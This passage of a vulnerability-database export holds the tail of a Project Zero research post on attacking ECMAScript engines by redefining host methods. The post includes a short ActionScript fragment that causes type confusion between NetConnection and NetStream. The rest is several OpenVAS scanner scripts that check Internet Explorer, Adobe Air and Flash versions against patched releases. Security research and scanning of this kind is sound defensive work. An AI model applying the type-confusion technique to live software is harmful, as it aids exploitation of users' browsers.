c){\n\nvar f = ASnative(2101, 200); // newStream\n\nvar n = new NetConnection();\n\nn.connect(y);\n\nf(this, n);\n\n}\n\n}\n\n}\n\n \n\n\nA watch is set on the URL property of a NetConnection object, and when it attempts to set the URL, the function func is called. This function redefines the this object as a NetStream (as opposed to a NetConnection), which leads to type confusion. The watch makes this possible, as it occurs after type checking, otherwise the function would fail to execute if called as a NetStream.\n\n# Subclassing\n\n \n\n\nSometimes it is possible to redefine a method or property of a class by subclassing it, if you control the construction of the object. Classes in ActionScript and JavaScript can be subclassed using the extends keyword. In addition, classes can sometimes be dynamically extended using the __proto__ or prototype keyword.\n\n# Resolution Methods\n\n \n\n\nJavaScript and AS2 objects also support resolution methods. These are methods are called when resolution of a property or method fails, as a last resort. In ActionScript 2, __resolve is a resolution function that gets called if resolution of a property or method fails. In JavaScript, there are a series of __lookUp*__ methods, such as __lookUpGetter__ which serve the same purpose (the specific method that get calls depends exactly on what type of resolution fails). These functions can be used to redefine methods or properties to reach bugs, but are also useful in finding bugs. Calling a native method on an object with a resolution method set is a good way to figure out what properties of the object the method is accessing, which can then be modified further\n\n# Conclusion\n\nRedefining host methods and properties can often violate the assumptions made by ECMAScript VMs when they access them. This is a good avenue for finding bugs in this type of software. \n\n \n\n", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806", "href": "https://googleprojectzero.blogspot.com/2015/08/attacking-ecmascript-engines-with.html", "type": "googleprojectzero", "title": "\nAttacking ECMAScript Engines with Redefinition\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-10T19:52:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0307", "CVE-2014-0313", "CVE-2014-0303", "CVE-2014-0322", "CVE-2014-0305", "CVE-2014-0299", "CVE-2014-0314", "CVE-2014-0306", "CVE-2014-0297", "CVE-2014-0321", "CVE-2014-0311", "CVE-2014-0304", "CVE-2014-0312", "CVE-2014-0298", "CVE-2014-0324", "CVE-2014-0308", "CVE-2014-0302", "CVE-2014-0309"], "description": "This host is missing a critical security update according to Microsoft\n Bulletin MS14-012.", "modified": "2020-06-09T00:00:00", "published": "2014-02-18T00:00:00", "id": "OPENVAS:1361412562310804500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804500", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (2925418)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (2925418)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804500\");\n script_version(\"2020-06-09T08:59:39+0000\");\n script_cve_id(\"CVE-2014-0297\", \"CVE-2014-0298\", \"CVE-2014-0299\", \"CVE-2014-0302\",\n \"CVE-2014-0303\", \"CVE-2014-0304\", \"CVE-2014-0305\", \"CVE-2014-0306\",\n \"CVE-2014-0307\", \"CVE-2014-0308\", \"CVE-2014-0309\", \"CVE-2014-0311\",\n \"CVE-2014-0312\", \"CVE-2014-0313\", \"CVE-2014-0314\", \"CVE-2014-0321\",\n \"CVE-2014-0322\", \"CVE-2014-0324\");\n script_bugtraq_id(66023, 66025, 66026, 66027, 66028, 66029, 66030, 66031, 66032,\n 66033, 66034, 66035, 66036, 66037, 66038, 66039, 65551, 66040);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 08:59:39 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-18 16:40:06 +0530 (Tue, 18 Feb 2014)\");\n script_name(\"Microsoft Internet Explorer Multiple Memory Corruption Vulnerabilities (2925418)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to Microsoft\n Bulletin MS14-012.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to, error when handling CMarkup objects and multiple\n unspecified errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code,\n corrupt memory and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x/10.x/11.x.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/2925418\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/bulletin/MS14-012\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:2, win2008:3, win8:1, win8_1:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^([6-9|1[01])\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6512\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.21370\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23568\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.5294\") ||\n version_in_range(version:dllVer, test_version:\"7.0.6000.00000\", test_version2:\"7.0.6000.21370\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23568\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.19040\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.23329\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19506\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23568\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16539\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20650\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18391\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22596\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16539\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20650\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.16842\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.20962\")||\n version_in_range(version:dllVer, test_version:\"11.0.9600.16000\", test_version2:\"11.0.9600.16520\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"10.0.9200.16000\", test_version2:\"10.0.9200.16842\")||\n version_in_range(version:dllVer, test_version:\"10.0.9200.20000\", test_version2:\"10.0.9200.20962\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win8_1:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"11.0.9600.16000\", test_version2:\"11.0.9600.16520\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2015-07-09T00:00:00", "id": "OPENVAS:1361412562310805912", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805912", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805912\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:41:16 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "Mageia Linux Local Security Checks mgasa-2015-0273", "modified": "2018-09-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130105", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0273.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130105\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:45 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0273\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.481 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0273.html\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0273\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.481~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-07-08T00:00:00", "id": "OPENVAS:1361412562310805904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805904", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805904\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:25:09 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 11.2.202.481 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.481 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"11.2.202.481\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.481\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-07-08T00:00:00", "id": "OPENVAS:1361412562310805903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805903", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805903\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 